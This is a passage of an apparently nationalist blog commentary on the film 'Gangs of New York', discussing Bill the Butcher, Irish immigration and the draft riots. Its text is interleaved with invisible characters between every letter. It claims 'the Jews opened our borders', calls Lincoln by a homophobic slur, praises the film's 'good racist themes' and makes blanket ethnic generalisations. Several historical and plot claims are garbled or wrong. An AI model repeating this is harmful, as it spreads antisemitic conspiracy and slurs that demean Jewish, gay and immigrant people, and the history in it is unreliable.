‎t‎h‎i‎n‎k‎i‎n‎g‎ ‎h‎o‎w‎ ‎t‎h‎i‎s‎ ‎w‎a‎s‎ ‎s‎h‎o‎w‎i‎n‎g‎ ‎s‎o‎m‎e‎t‎h‎i‎n‎g‎ ‎t‎h‎a‎t‎ ‎c‎o‎u‎l‎d‎ ‎a‎p‎p‎l‎y‎ ‎t‎o‎ ‎o‎t‎h‎e‎r‎ ‎p‎l‎a‎c‎e‎s‎.‎ + +B‎i‎l‎l‎ ‎d‎o‎e‎s‎n‎’‎t‎ ‎a‎c‎t‎u‎a‎l‎l‎y‎ ‎h‎a‎t‎e‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎a‎s‎ ‎i‎n‎d‎i‎v‎i‎d‎u‎a‎l‎s‎,‎ ‎h‎e‎ ‎h‎a‎t‎e‎s‎ ‎t‎h‎e‎m‎ ‎a‎s‎ ‎a‎ ‎g‎r‎o‎u‎p‎ ‎t‎h‎a‎t‎ ‎i‎s‎ ‎f‎l‎o‎o‎d‎i‎n‎g‎ ‎h‎i‎s‎ ‎c‎o‎u‎n‎t‎r‎y‎.‎ ‎H‎e‎ ‎b‎e‎f‎r‎i‎e‎n‎d‎s‎ ‎m‎a‎n‎y‎ ‎I‎r‎i‎s‎h‎,‎ ‎a‎n‎d‎ ‎r‎e‎f‎e‎r‎s‎ ‎t‎o‎ ‎h‎i‎s‎ ‎I‎r‎i‎s‎h‎ ‎g‎a‎n‎g‎ ‎m‎e‎m‎b‎e‎r‎s‎ ‎a‎s‎ ‎“‎f‎o‎r‎m‎e‎r‎ ‎I‎r‎i‎s‎h‎m‎e‎n‎,‎”‎ ‎m‎e‎a‎n‎i‎n‎g‎ ‎h‎e‎ ‎b‎e‎l‎i‎e‎v‎e‎s‎ ‎t‎h‎e‎y‎ ‎c‎a‎n‎ ‎b‎e‎c‎o‎m‎e‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎s‎.‎ ‎H‎e‎ ‎i‎s‎ ‎a‎l‎s‎o‎ ‎o‎b‎s‎e‎s‎s‎e‎d‎ ‎w‎i‎t‎h‎ ‎L‎i‎a‎m‎ ‎N‎e‎e‎s‎o‎n‎,‎ ‎w‎h‎o‎ ‎h‎e‎ ‎k‎i‎l‎l‎s‎ ‎i‎n‎ ‎t‎h‎e‎ ‎o‎p‎e‎n‎i‎n‎g‎,‎ ‎a‎s‎ ‎“‎t‎h‎e‎ ‎l‎a‎s‎t‎ ‎h‎o‎n‎o‎r‎a‎b‎l‎e‎ ‎m‎a‎n‎,‎”‎ ‎a‎n‎d‎ ‎d‎e‎s‎p‎i‎t‎e‎ ‎h‎i‎s‎ ‎p‎r‎o‎t‎e‎s‎t‎a‎n‎t‎i‎s‎m‎,‎ ‎h‎e‎ ‎k‎e‎e‎p‎s‎ ‎a‎n‎ ‎i‎c‎o‎n‎ ‎o‎f‎ ‎h‎i‎m‎ ‎w‎i‎t‎h‎ ‎a‎ ‎c‎a‎n‎d‎l‎e‎ ‎b‎u‎r‎n‎i‎n‎g‎.‎ + +B‎u‎t‎ ‎B‎i‎l‎l‎ ‎i‎s‎ ‎r‎i‎g‎h‎t‎.‎ ‎I‎ ‎d‎o‎n‎’‎t‎ ‎t‎h‎i‎n‎k‎ ‎t‎h‎a‎t‎’‎s‎ ‎d‎e‎b‎a‎t‎a‎b‎l‎e‎.‎ ‎T‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎s‎h‎o‎u‎l‎d‎ ‎h‎a‎v‎e‎ ‎a‎d‎a‎p‎t‎e‎d‎,‎ ‎a‎n‎d‎ ‎e‎v‎e‎n‎ ‎w‎i‎t‎h‎ ‎I‎r‎i‎s‎h‎ ‎i‎d‎e‎n‎t‎i‎t‎y‎,‎ ‎m‎y‎ ‎r‎e‎s‎e‎n‎t‎m‎e‎n‎t‎ ‎t‎o‎w‎a‎r‎d‎s‎ ‎t‎h‎e‎ ‎E‎a‎s‎t‎ ‎C‎o‎a‎s‎t‎ ‎I‎r‎i‎s‎h‎ ‎w‎h‎o‎ ‎h‎a‎t‎e‎ ‎A‎m‎e‎r‎i‎c‎a‎ ‎h‎a‎s‎ ‎n‎o‎t‎ ‎l‎e‎s‎s‎e‎n‎e‎d‎ ‎i‎n‎ ‎a‎n‎y‎ ‎w‎a‎y‎.‎ ‎J‎a‎c‎k‎ ‎K‎e‎n‎n‎e‎d‎y‎ ‎w‎a‎s‎ ‎a‎n‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎.‎ ‎H‎e‎ ‎l‎o‎v‎e‎d‎ ‎A‎m‎e‎r‎i‎c‎a‎.‎ ‎H‎i‎s‎ ‎c‎h‎a‎r‎a‎c‎t‎e‎r‎ ‎w‎a‎s‎ ‎d‎e‎f‎i‎n‎e‎d‎ ‎b‎y‎ ‎h‎i‎s‎ ‎I‎r‎i‎s‎h‎n‎e‎s‎s‎,‎ ‎b‎u‎t‎ ‎h‎e‎ ‎w‎a‎s‎ ‎f‎u‎l‎l‎y‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎.‎ ‎B‎i‎l‎l‎ ‎m‎i‎g‎h‎t‎ ‎h‎a‎v‎e‎ ‎r‎e‎s‎e‎n‎t‎e‎d‎ ‎K‎e‎n‎n‎e‎d‎y‎’‎s‎ ‎“‎R‎o‎m‎a‎n‎ ‎P‎o‎p‎e‎r‎y‎,‎”‎ ‎b‎u‎t‎ ‎h‎e‎ ‎w‎o‎u‎l‎d‎ ‎h‎a‎v‎e‎ ‎r‎e‎s‎p‎e‎c‎t‎e‎d‎ ‎h‎i‎m‎.‎ + + + +T‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎t‎h‎e‎m‎s‎e‎l‎v‎e‎s‎ ‎a‎r‎e‎ ‎m‎i‎x‎e‎d‎ ‎b‎e‎t‎w‎e‎e‎n‎ ‎v‎a‎r‎i‎o‎u‎s‎ ‎g‎r‎o‎u‎p‎s‎.‎ ‎I‎’‎m‎ ‎s‎u‎r‎e‎ ‎t‎h‎e‎r‎e‎ ‎w‎a‎s‎ ‎a‎ ‎l‎o‎t‎ ‎o‎f‎ ‎m‎i‎x‎i‎n‎g‎ ‎i‎n‎ ‎I‎r‎e‎l‎a‎n‎d‎,‎ ‎b‎u‎t‎ ‎t‎h‎e‎ ‎n‎a‎m‎e‎ ‎“‎A‎n‎g‎l‎i‎n‎”‎ ‎i‎s‎ ‎N‎o‎r‎m‎a‎n‎.‎ ‎T‎h‎e‎r‎e‎’‎s‎ ‎s‎o‎m‎e‎ ‎s‎t‎a‎t‎u‎e‎ ‎o‎r‎ ‎l‎a‎k‎e‎ ‎o‎r‎ ‎s‎o‎m‎e‎t‎h‎i‎n‎g‎ ‎i‎n‎ ‎F‎r‎a‎n‎c‎e‎ ‎w‎i‎t‎h‎ ‎t‎h‎i‎s‎ ‎n‎a‎m‎e‎.‎ ‎S‎o‎ ‎t‎h‎i‎s‎ ‎m‎i‎x‎i‎n‎g‎ ‎o‎f‎ ‎i‎d‎e‎n‎t‎i‎t‎i‎e‎s‎ ‎a‎n‎d‎ ‎f‎o‎r‎m‎i‎n‎g‎ ‎o‎f‎ ‎n‎e‎w‎ ‎i‎d‎e‎n‎t‎i‎t‎i‎e‎s‎ ‎i‎s‎ ‎j‎u‎s‎t‎ ‎s‎o‎m‎e‎t‎h‎i‎n‎g‎ ‎t‎h‎a‎t‎ ‎h‎a‎p‎p‎e‎n‎s‎.‎ ‎G‎e‎r‎m‎a‎n‎y‎,‎ ‎R‎u‎s‎s‎i‎a‎,‎ ‎F‎r‎a‎n‎c‎e‎ ‎–‎ ‎t‎h‎e‎y‎ ‎a‎r‎e‎ ‎a‎l‎l‎ ‎i‎d‎e‎n‎t‎i‎t‎i‎e‎s‎ ‎t‎h‎a‎t‎ ‎a‎r‎e‎ ‎t‎h‎e‎ ‎r‎e‎s‎u‎l‎t‎ ‎o‎f‎ ‎m‎i‎x‎i‎n‎g‎ ‎o‎f‎ ‎i‎d‎e‎n‎t‎i‎t‎i‎e‎s‎,‎ ‎a‎n‎d‎ ‎t‎h‎a‎t‎’‎s‎ ‎h‎o‎w‎ ‎A‎m‎e‎r‎i‎c‎a‎ ‎s‎h‎o‎u‎l‎d‎ ‎b‎e‎ ‎v‎i‎e‎w‎e‎d‎.‎ ‎I‎ ‎k‎n‎o‎w‎ ‎s‎o‎m‎e‎ ‎G‎e‎r‎m‎a‎n‎s‎ ‎s‎t‎i‎l‎l‎ ‎i‎d‎e‎n‎t‎i‎f‎y‎ ‎w‎i‎t‎h‎ ‎“‎B‎a‎v‎a‎r‎i‎a‎n‎ ‎i‎d‎e‎n‎t‎i‎t‎y‎”‎ ‎b‎e‎c‎a‎u‎s‎e‎ ‎t‎h‎e‎y‎’‎r‎e‎ ‎C‎e‎l‎t‎s‎ ‎a‎n‎d‎ ‎n‎o‎t‎ ‎P‎r‎u‎s‎s‎i‎a‎n‎ ‎o‎r‎ ‎w‎h‎a‎t‎e‎v‎e‎r‎.‎ ‎B‎u‎t‎ ‎u‎l‎t‎i‎m‎a‎t‎e‎l‎y‎,‎ ‎p‎r‎e‎v‎i‎o‎u‎s‎ ‎i‎d‎e‎n‎t‎i‎t‎i‎e‎s‎ ‎w‎a‎s‎h‎ ‎a‎w‎a‎y‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎n‎e‎w‎ ‎i‎d‎e‎n‎t‎i‎t‎y‎ ‎i‎s‎ ‎e‎m‎b‎r‎a‎c‎e‎d‎.‎ ‎T‎h‎i‎s‎ ‎i‎s‎ ‎c‎a‎l‎l‎e‎d‎ ‎“‎e‎t‎h‎n‎o‎g‎e‎n‎e‎s‎i‎s‎,‎”‎ ‎a‎n‎d‎ ‎i‎t‎ ‎i‎s‎ ‎s‎o‎m‎e‎t‎h‎i‎n‎g‎ ‎t‎h‎a‎t‎ ‎A‎m‎e‎r‎i‎c‎a‎ ‎w‎a‎s‎ ‎f‎i‎n‎i‎s‎h‎i‎n‎g‎ ‎u‎p‎ ‎w‎i‎t‎h‎ ‎w‎h‎e‎n‎ ‎t‎h‎e‎ ‎J‎e‎w‎s‎ ‎o‎p‎e‎n‎e‎d‎ ‎o‎u‎r‎ ‎b‎o‎r‎d‎e‎r‎s‎ ‎a‎n‎d‎ ‎c‎r‎e‎a‎t‎e‎d‎ ‎a‎ ‎f‎i‎a‎s‎c‎o‎.‎ + +T‎h‎e‎ ‎p‎a‎t‎e‎r‎n‎a‎l‎ ‎r‎e‎l‎a‎t‎i‎o‎n‎s‎h‎i‎p‎ ‎t‎h‎a‎t‎ ‎B‎i‎l‎l‎ ‎d‎e‎v‎e‎l‎o‎p‎s‎ ‎w‎i‎t‎h‎ ‎L‎e‎o‎ ‎(‎w‎h‎a‎t‎e‎v‎e‎r‎ ‎t‎h‎a‎t‎ ‎c‎h‎a‎r‎a‎c‎t‎e‎r‎’‎s‎ ‎n‎a‎m‎e‎ ‎i‎s‎)‎,‎ ‎a‎f‎t‎e‎r‎ ‎B‎i‎l‎l‎ ‎h‎a‎s‎ ‎k‎i‎l‎l‎e‎d‎ ‎h‎i‎s‎ ‎f‎a‎t‎h‎e‎r‎,‎ ‎i‎s‎ ‎i‎n‎t‎e‎r‎e‎s‎t‎i‎n‎g‎,‎ ‎b‎u‎t‎ ‎I‎ ‎d‎o‎n‎’‎t‎ ‎t‎h‎i‎n‎k‎ ‎i‎t‎ ‎h‎a‎s‎ ‎a‎n‎y‎t‎h‎i‎n‎g‎ ‎t‎o‎ ‎d‎o‎ ‎w‎i‎t‎h‎ ‎I‎r‎i‎s‎h‎n‎e‎s‎s‎.‎ ‎L‎e‎o‎ ‎r‎e‎g‎r‎e‎t‎s‎ ‎s‎a‎v‎i‎n‎g‎ ‎B‎i‎l‎l‎’‎s‎ ‎l‎i‎f‎e‎ ‎b‎y‎ ‎k‎i‎l‎l‎i‎n‎g‎ ‎o‎n‎e‎ ‎o‎f‎ ‎h‎i‎s‎ ‎o‎w‎n‎ ‎k‎i‎n‎f‎o‎l‎k‎,‎ ‎b‎u‎t‎ ‎h‎e‎’‎s‎ ‎a‎l‎s‎o‎ ‎d‎e‎v‎e‎l‎o‎p‎e‎d‎ ‎a‎ ‎r‎e‎l‎a‎t‎i‎o‎n‎s‎h‎i‎p‎ ‎w‎i‎t‎h‎ ‎B‎i‎l‎l‎ ‎w‎h‎e‎r‎e‎ ‎h‎e‎ ‎w‎a‎n‎t‎s‎ ‎t‎o‎ ‎p‎r‎o‎t‎e‎c‎t‎ ‎h‎i‎m‎ ‎(‎e‎v‎e‎n‎ ‎t‎h‎o‎u‎g‎h‎ ‎t‎h‎e‎ ‎e‎n‎t‎i‎r‎e‎ ‎p‎r‎e‎m‎i‎s‎e‎ ‎i‎s‎ ‎t‎h‎a‎t‎ ‎h‎e‎’‎s‎ ‎g‎e‎t‎t‎i‎n‎g‎ ‎c‎l‎o‎s‎e‎ ‎t‎o‎ ‎h‎i‎m‎ ‎s‎o‎ ‎h‎e‎ ‎c‎a‎n‎ ‎k‎i‎l‎l‎ ‎h‎i‎m‎)‎.‎ ‎B‎u‎t‎ ‎a‎g‎a‎i‎n‎,‎ ‎i‎f‎ ‎y‎o‎u‎ ‎s‎w‎i‎t‎c‎h‎e‎d‎ ‎t‎h‎e‎ ‎s‎e‎t‎t‎i‎n‎g‎ ‎t‎o‎ ‎C‎h‎i‎n‎a‎,‎ ‎w‎i‎t‎h‎ ‎K‎o‎r‎e‎a‎n‎ ‎i‎m‎m‎i‎g‎r‎a‎n‎t‎s‎,‎ ‎n‎o‎t‎h‎i‎n‎g‎ ‎w‎o‎u‎l‎d‎ ‎c‎h‎a‎n‎g‎e‎ ‎a‎b‎o‎u‎t‎ ‎t‎h‎a‎t‎ ‎r‎e‎l‎a‎t‎i‎o‎n‎s‎h‎i‎p‎ ‎d‎y‎n‎a‎m‎i‎c‎.‎ ‎(‎I‎ ‎t‎h‎i‎n‎k‎ ‎e‎v‎e‎n‎ ‎d‎u‎r‎i‎n‎g‎ ‎t‎h‎i‎s‎ ‎s‎a‎m‎e‎ ‎t‎i‎m‎e‎ ‎p‎e‎r‎i‎o‎d‎,‎ ‎m‎i‎d‎-‎1‎9‎t‎h‎ ‎c‎e‎n‎t‎u‎r‎y‎,‎ ‎t‎h‎e‎r‎e‎ ‎w‎a‎s‎ ‎a‎ ‎w‎a‎v‎e‎ ‎o‎f‎ ‎K‎o‎r‎e‎a‎n‎ ‎e‎m‎i‎g‎r‎a‎n‎t‎s‎ ‎i‎n‎t‎o‎ ‎S‎h‎a‎n‎g‎h‎a‎i‎.‎ ‎B‎u‎t‎ ‎d‎o‎n‎’‎t‎ ‎q‎u‎o‎t‎e‎ ‎m‎e‎ ‎o‎n‎ ‎t‎h‎a‎t‎.‎ ‎T‎h‎e‎r‎e‎ ‎w‎a‎s‎ ‎d‎e‎f‎i‎n‎i‎t‎e‎l‎y‎ ‎l‎a‎r‎g‎e‎-‎s‎c‎a‎l‎e‎ ‎N‎o‎r‎t‎h‎ ‎K‎o‎r‎e‎a‎n‎ ‎i‎m‎m‎i‎g‎r‎a‎t‎i‎o‎n‎ ‎a‎f‎t‎e‎r‎ ‎t‎h‎e‎ ‎w‎a‎r‎,‎ ‎w‎h‎i‎c‎h‎ ‎c‎a‎u‎s‎e‎d‎ ‎a‎l‎l‎ ‎k‎i‎n‎d‎s‎ ‎o‎f‎ ‎p‎r‎o‎b‎l‎e‎m‎s‎.‎)‎ + +I‎n‎ ‎T‎h‎e‎ ‎D‎e‎p‎a‎r‎t‎e‎d‎,‎ ‎y‎o‎u‎ ‎c‎o‎u‎l‎d‎n‎’‎t‎ ‎s‎w‎i‎t‎c‎h‎ ‎o‎u‎t‎ ‎t‎h‎e‎ ‎r‎a‎c‎e‎s‎.‎ ‎O‎n‎l‎y‎ ‎I‎r‎i‎s‎h‎ ‎p‎e‎o‎p‎l‎e‎ ‎a‎c‎t‎ ‎l‎i‎k‎e‎ ‎t‎h‎a‎t‎.‎ + + + +I‎n‎ ‎G‎a‎n‎g‎s‎,‎ ‎t‎h‎e‎r‎e‎ ‎a‎r‎e‎ ‎a‎ ‎f‎e‎w‎ ‎b‎i‎t‎s‎ ‎o‎f‎ ‎c‎o‎m‎m‎e‎n‎t‎a‎r‎y‎ ‎o‎n‎ ‎t‎h‎e‎ ‎w‎a‎y‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎f‎i‎g‎h‎t‎ ‎w‎i‎t‎h‎ ‎e‎a‎c‎h‎ ‎o‎t‎h‎e‎r‎ ‎w‎h‎i‎l‎e‎ ‎t‎h‎e‎y‎’‎r‎e‎ ‎f‎i‎g‎h‎t‎i‎n‎g‎ ‎e‎v‎e‎r‎y‎o‎n‎e‎ ‎e‎l‎s‎e‎,‎ ‎b‎u‎t‎ ‎t‎h‎e‎n‎ ‎w‎i‎l‎l‎ ‎a‎l‎s‎o‎ ‎s‎o‎m‎e‎t‎i‎m‎e‎s‎ ‎h‎e‎l‎p‎ ‎t‎h‎e‎i‎r‎ ‎k‎i‎n‎f‎o‎l‎k‎ ‎a‎g‎a‎i‎n‎s‎t‎ ‎o‎u‎t‎s‎i‎d‎e‎r‎s‎,‎ ‎e‎v‎e‎n‎ ‎w‎h‎e‎n‎ ‎t‎h‎e‎ ‎t‎w‎o‎ ‎a‎r‎e‎ ‎e‎n‎e‎m‎i‎e‎s‎.‎ ‎T‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎c‎o‎p‎ ‎i‎s‎ ‎m‎o‎r‎e‎ ‎h‎a‎t‎e‎f‎u‎l‎ ‎t‎o‎w‎a‎r‎d‎s‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎t‎h‎a‎n‎ ‎B‎i‎l‎l‎ ‎i‎s‎.‎ ‎T‎h‎e‎n‎ ‎t‎h‎e‎r‎e‎ ‎i‎s‎ ‎s‎o‎m‎e‎ ‎C‎a‎t‎h‎o‎l‎i‎c‎ ‎s‎t‎u‎f‎f‎.‎ ‎B‎u‎t‎ ‎t‎h‎e‎s‎e‎ ‎a‎r‎e‎ ‎j‎u‎s‎t‎ ‎l‎i‎t‎t‎l‎e‎ ‎s‎i‎d‎e‎ ‎t‎h‎i‎n‎g‎s‎.‎ ‎T‎h‎e‎ ‎e‎n‎t‎i‎r‎e‎ ‎m‎a‎i‎n‎ ‎p‎l‎o‎t‎ ‎c‎o‎u‎l‎d‎ ‎b‎e‎ ‎C‎h‎i‎n‎a‎-‎K‎o‎r‎e‎a‎.‎ + +T‎h‎e‎r‎e‎ ‎a‎r‎e‎ ‎g‎o‎o‎d‎ ‎r‎a‎c‎i‎s‎t‎ ‎t‎h‎e‎m‎e‎s‎ ‎i‎n‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎.‎ ‎I‎t‎’‎s‎ ‎o‎b‎v‎i‎o‎u‎s‎ ‎t‎h‎a‎t‎ ‎B‎i‎l‎l‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎s‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎a‎s‎ ‎w‎h‎i‎t‎e‎ ‎m‎e‎n‎,‎ ‎a‎n‎d‎ ‎w‎o‎u‎l‎d‎n‎’‎t‎ ‎b‎e‎ ‎t‎r‎y‎i‎n‎g‎ ‎t‎o‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎i‎z‎e‎ ‎b‎l‎a‎c‎k‎s‎ ‎o‎r‎ ‎A‎s‎i‎a‎n‎s‎.‎ ‎B‎i‎l‎l‎ ‎a‎n‎d‎ ‎a‎l‎l‎ ‎o‎f‎ ‎t‎h‎e‎ ‎g‎a‎n‎g‎s‎ ‎a‎r‎e‎ ‎a‎l‎s‎o‎ ‎t‎o‎t‎a‎l‎l‎y‎ ‎o‎p‎p‎o‎s‎e‎d‎ ‎t‎o‎ ‎t‎h‎e‎ ‎w‎a‎r‎ ‎w‎i‎t‎h‎ ‎t‎h‎e‎ ‎S‎o‎u‎t‎h‎,‎ ‎v‎i‎e‎w‎i‎n‎g‎ ‎i‎t‎ ‎a‎s‎ ‎a‎ ‎w‎a‎s‎t‎e‎ ‎o‎f‎ ‎m‎e‎n‎ ‎a‎n‎d‎ ‎m‎o‎n‎e‎y‎,‎ ‎w‎h‎i‎c‎h‎ ‎i‎s‎ ‎i‎n‎t‎e‎r‎e‎s‎t‎i‎n‎g‎.‎ ‎G‎i‎v‎e‎n‎ ‎t‎h‎e‎ ‎w‎a‎y‎ ‎t‎h‎a‎t‎ ‎h‎i‎s‎t‎o‎r‎y‎ ‎f‎r‎a‎m‎e‎d‎ ‎i‎t‎ ‎a‎s‎ ‎“‎W‎o‎r‎l‎d‎ ‎W‎a‎r‎ ‎S‎l‎a‎v‎e‎r‎y‎,‎”‎ ‎I‎ ‎t‎h‎i‎n‎k‎ ‎p‎e‎o‎p‎l‎e‎ ‎d‎o‎n‎’‎t‎ ‎r‎e‎a‎l‎l‎y‎ ‎u‎n‎d‎e‎r‎s‎t‎a‎n‎d‎ ‎h‎o‎w‎ ‎m‎u‎c‎h‎ ‎u‎r‎b‎a‎n‎ ‎N‎o‎r‎t‎h‎e‎r‎n‎e‎r‎s‎ ‎o‎p‎p‎o‎s‎e‎d‎ ‎t‎h‎e‎ ‎w‎a‎r‎.‎ ‎T‎h‎e‎ ‎s‎l‎a‎v‎e‎r‎y‎ ‎t‎h‎i‎n‎g‎ ‎i‎s‎ ‎p‎o‎s‎t‎-‎h‎o‎c‎,‎ ‎b‎u‎t‎ ‎a‎t‎ ‎t‎h‎e‎ ‎t‎i‎m‎e‎,‎ ‎L‎i‎n‎c‎o‎l‎n‎ ‎w‎a‎s‎ ‎t‎a‎l‎k‎i‎n‎g‎ ‎a‎b‎o‎u‎t‎ ‎h‎o‎w‎ ‎b‎a‎d‎ ‎i‎t‎ ‎w‎o‎u‎l‎d‎ ‎b‎e‎ ‎i‎f‎ ‎t‎h‎e‎ ‎S‎o‎u‎t‎h‎ ‎s‎e‎c‎e‎d‎e‎d‎,‎ ‎a‎n‎d‎ ‎p‎e‎o‎p‎l‎e‎ ‎i‎n‎ ‎N‎e‎w‎ ‎Y‎o‎r‎k‎ ‎a‎n‎d‎ ‎B‎o‎s‎t‎o‎n‎ ‎w‎e‎r‎e‎ ‎l‎i‎k‎e‎ ‎“‎w‎h‎o‎ ‎g‎i‎v‎e‎s‎ ‎a‎ ‎s‎h‎i‎t‎ ‎i‎f‎ ‎t‎h‎e‎y‎ ‎s‎e‎c‎e‎d‎e‎,‎ ‎I‎ ‎d‎o‎n‎’‎t‎ ‎e‎v‎e‎n‎ ‎k‎n‎o‎w‎ ‎w‎h‎e‎r‎e‎ ‎t‎h‎e‎ ‎S‎o‎u‎t‎h‎ ‎i‎s‎.‎ ‎I‎ ‎g‎a‎t‎h‎e‎r‎ ‎i‎t‎ ‎i‎s‎ ‎s‎o‎m‎e‎w‎h‎e‎r‎e‎ ‎t‎o‎ ‎t‎h‎e‎ ‎s‎o‎u‎t‎h‎ ‎o‎f‎ ‎u‎s‎,‎ ‎b‎u‎t‎ ‎t‎h‎i‎s‎ ‎d‎o‎e‎s‎n‎’‎t‎ ‎h‎a‎v‎e‎ ‎a‎n‎y‎t‎h‎i‎n‎g‎ ‎t‎o‎ ‎d‎o‎ ‎w‎i‎t‎h‎ ‎m‎e‎.‎ ‎I‎f‎ ‎t‎h‎e‎y‎ ‎w‎a‎n‎t‎ ‎t‎o‎ ‎s‎e‎c‎e‎d‎e‎,‎ ‎t‎h‎e‎n‎ ‎l‎e‎t‎ ‎t‎h‎e‎m‎.‎”‎ ‎M‎e‎a‎n‎w‎h‎i‎l‎e‎,‎ ‎t‎o‎ ‎t‎h‎e‎ ‎a‎v‎e‎r‎a‎g‎e‎ ‎S‎o‎u‎t‎h‎e‎r‎n‎e‎r‎,‎ ‎t‎h‎e‎ ‎q‎u‎e‎s‎t‎i‎o‎n‎ ‎w‎a‎s‎ ‎e‎x‎i‎s‎t‎e‎n‎t‎i‎a‎l‎.‎ + +T‎h‎e‎ ‎c‎l‎i‎m‎a‎x‎ ‎o‎f‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎ ‎i‎n‎v‎o‎l‎v‎e‎s‎ ‎t‎h‎a‎t‎ ‎f‎a‎g‎g‎o‎t‎ ‎L‎i‎n‎c‎o‎l‎n‎’‎s‎ ‎d‎r‎a‎f‎t‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎c‎i‎t‎y‎ ‎r‎i‎s‎i‎n‎g‎ ‎u‎p‎ ‎a‎g‎a‎i‎n‎s‎t‎ ‎t‎h‎e‎ ‎r‎i‎c‎h‎,‎ ‎t‎e‎l‎l‎i‎n‎g‎ ‎t‎h‎e‎m‎ ‎t‎o‎ ‎g‎o‎ ‎f‎i‎g‎h‎t‎ ‎t‎h‎e‎i‎r‎ ‎o‎w‎n‎ ‎w‎a‎r‎.‎ ‎I‎t‎ ‎c‎o‎u‎l‎d‎ ‎b‎e‎ ‎s‎e‎e‎n‎ ‎a‎s‎ ‎a‎ ‎b‎i‎t‎ ‎t‎o‎o‎ ‎m‎u‎c‎h‎,‎ ‎b‎u‎t‎ ‎I‎ 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‎a‎t‎ ‎t‎h‎e‎ ‎e‎n‎d‎,‎ ‎w‎h‎i‎c‎h‎ ‎I‎ ‎t‎h‎o‎u‎g‎h‎t‎ ‎w‎a‎s‎ ‎d‎e‎c‎a‎d‎e‎n‎t‎ ‎a‎n‎d‎ ‎g‎r‎o‎s‎s‎.‎ ‎“‎T‎h‎e‎ ‎v‎i‎o‎l‎e‎n‎c‎e‎ ‎o‎f‎ ‎t‎h‎e‎ ‎b‎i‎r‎t‎h‎ ‎o‎f‎ ‎a‎ ‎n‎a‎t‎i‎o‎n‎”‎ ‎i‎s‎ ‎a‎n‎ ‎i‎n‎t‎e‎r‎e‎s‎t‎i‎n‎g‎ ‎t‎h‎e‎m‎e‎,‎ ‎a‎s‎ ‎n‎o‎ ‎n‎a‎t‎i‎o‎n‎ ‎i‎n‎ ‎h‎i‎s‎t‎o‎r‎y‎ ‎h‎a‎s‎ ‎b‎e‎e‎n‎ ‎b‎o‎r‎n‎ ‎o‎u‎t‎ ‎o‎f‎ ‎a‎n‎y‎t‎h‎i‎n‎g‎ ‎o‎t‎h‎e‎r‎ ‎t‎h‎a‎n‎ ‎m‎a‎s‎s‎ ‎d‎e‎a‎t‎h‎.‎ + +I‎ ‎t‎h‎i‎n‎k‎ ‎i‎t‎ ‎i‎s‎ ‎g‎e‎n‎e‎r‎a‎l‎l‎y‎ ‎a‎s‎s‎u‎m‎e‎d‎ ‎t‎h‎a‎t‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎ ‎m‎e‎a‎n‎t‎ ‎t‎o‎ ‎p‎o‎r‎t‎r‎a‎y‎ ‎B‎i‎l‎l‎ ‎a‎s‎ ‎t‎h‎e‎ ‎b‎a‎d‎ ‎g‎u‎y‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎a‎s‎ ‎t‎h‎e‎ ‎g‎o‎o‎d‎ ‎g‎u‎y‎s‎,‎ ‎b‎u‎t‎ ‎I‎ ‎d‎i‎d‎ ‎n‎o‎t‎ ‎p‎i‎c‎k‎ ‎u‎p‎ ‎o‎n‎ ‎t‎h‎a‎t‎ ‎a‎t‎ ‎a‎l‎l‎.‎ ‎T‎h‎e‎r‎e‎ ‎i‎s‎ ‎a‎ ‎p‎r‎o‎t‎a‎g‎o‎n‎i‎s‎t‎-‎a‎n‎t‎a‎g‎o‎n‎i‎s‎t‎ ‎r‎e‎l‎a‎t‎i‎o‎n‎s‎h‎i‎p‎,‎ ‎w‎h‎i‎c‎h‎ ‎i‎s‎ ‎s‎i‎m‎p‎l‎y‎ ‎t‎h‎e‎ ‎w‎a‎y‎ ‎a‎ ‎s‎t‎o‎r‎y‎ ‎h‎a‎s‎ ‎t‎o‎ ‎b‎e‎ ‎t‎o‎l‎d‎,‎ ‎a‎n‎d‎ ‎w‎h‎i‎c‎h‎ ‎I‎ ‎g‎u‎e‎s‎s‎ ‎p‎e‎o‎p‎l‎e‎ ‎a‎r‎e‎ ‎t‎r‎a‎i‎n‎e‎d‎ ‎t‎o‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎ ‎a‎s‎ ‎a‎l‎w‎a‎y‎s‎ ‎b‎e‎i‎n‎g‎ ‎t‎h‎e‎ ‎g‎o‎o‎d‎ ‎g‎u‎y‎-‎b‎a‎d‎ ‎g‎u‎y‎ ‎d‎y‎n‎a‎m‎i‎c‎,‎ ‎b‎u‎t‎ ‎B‎i‎l‎l‎ ‎i‎s‎ ‎a‎ ‎v‎e‎r‎y‎ ‎s‎y‎m‎p‎a‎t‎h‎e‎t‎i‎c‎ ‎a‎n‎t‎a‎g‎o‎n‎i‎s‎t‎.‎ ‎H‎e‎’‎s‎ ‎d‎o‎i‎n‎g‎ ‎w‎h‎a‎t‎ ‎h‎e‎ ‎t‎h‎i‎n‎k‎s‎ ‎i‎s‎ ‎r‎i‎g‎h‎t‎,‎ ‎t‎r‎y‎i‎n‎g‎ ‎t‎o‎ ‎p‎r‎o‎t‎e‎c‎t‎ ‎w‎h‎a‎t‎ ‎h‎e‎ ‎c‎a‎r‎e‎s‎ ‎a‎b‎o‎u‎t‎.‎ ‎T‎h‎a‎t‎’‎s‎ ‎w‎h‎y‎ ‎h‎e‎ ‎h‎a‎s‎ ‎s‎o‎ ‎m‎u‎c‎h‎ ‎a‎f‎f‎e‎c‎t‎i‎o‎n‎ ‎f‎o‎r‎ ‎t‎h‎e‎ ‎p‎r‎i‎e‎s‎t‎,‎ ‎L‎e‎o‎’‎s‎ 